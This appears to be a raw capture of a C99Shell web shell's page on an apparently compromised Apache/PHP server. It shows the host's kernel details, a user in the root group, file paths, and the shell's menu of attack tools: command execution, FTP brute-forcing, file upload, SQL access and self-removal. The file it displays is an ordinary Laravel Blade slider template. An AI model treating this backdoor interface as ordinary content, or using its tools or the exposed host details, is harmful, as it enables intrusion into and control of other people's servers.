!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/storage/framework/views/   drwxr-xr-x
Free 26.23 GB of 117.98 GB (22.24%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     d9c229490e91670b056972c6afd3215312fcc0c8.php (2.9 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    $slider 
$component->slider ?? [];
?>
<?php 
if(count($slider) > 0): ?>
    <div class="md:w-322p w-full pb-2 sidebar_slider">
        <?php $__currentLoopData $slider$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $slide): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
            <?php
                $slide 
miniCollection($slide);
            
?>
            <div class="relative h-600p w-full builder_slider fade">
                <?php if(isset($slide->image)): ?>
                    <img class="w-full h-full object-cover neg-transition-scale rounded-md"
                        src="<?php echo e(asset('public/uploads') . DIRECTORY_SEPARATOR $slide->image); ?>">
                <?php endif; ?>
                <div class="absolute bottom-0 p-6">
                    <?php if($slide->u_subtitle): ?>
                        <p class="text-11 text-white dm-regular font-normal">
                            <?php echo e($slide->u_subtitle); ?></p>
                    <?php endif; ?>
                    <?php if($slide->l_subtitle): ?>
                        <p class="text-white text-lg uppercase font-bold dm-bold">
                            <?php echo $slide->l_subtitle?>

                        </p>
                    <?php endif; ?>
                    <p class="text-white text-2.5xl -mt-1.5 uppercase font-bold dm-bold">
                        <?php echo e($slide->title); ?></p>
                    <?php if($slide->button_text): ?>
                        <a href="<?php echo e($slide->button_link ?? '#'); ?>"
                            class="process-goto hover:bg-gray-12 hover:text-white text-white border-white cursor-pointer relative flex justify-center rounded-sm text-xs mt-13p items-center py-2 w-29 dm-sans border">
                            <span><?php echo $slide->button_text ?? __('Shop Now'); ?></span>
                            <svg class="<?php echo e(languageDirection() == 'ltr' 'ml-5p' 'mr-5p neg-transition-scale'); ?> relative" width="10" height="7" viewBox="0 0 10 7"
                                fill="currentColor" xmlns="http://www.w3.org/2000/svg">
                                <path fill-rule="evenodd" clip-rule="evenodd"
                                    d="M6.7344 0L5.75327 1.05155L7.34399 2.75644H0.69376C0.310607 2.75644 0 3.08934 0 3.5C0 3.91066 0.310607 4.24356 0.69376 4.24356H7.34399L5.75327 5.94845L6.7344 7L10 3.5L6.7344 0Z"
                                    fill="currentColor"></path>
                            </svg>
                        </a>
                    <?php endif; ?>

                </div>
            </div>
        <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
    </div>
<?php endif; ?>
<?php 
/**PATH /home/picotech/domains/ecom1.picotech.app/public_html/Modules/CMS/Resources/views/partials/gridbox_slider.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0048 ]--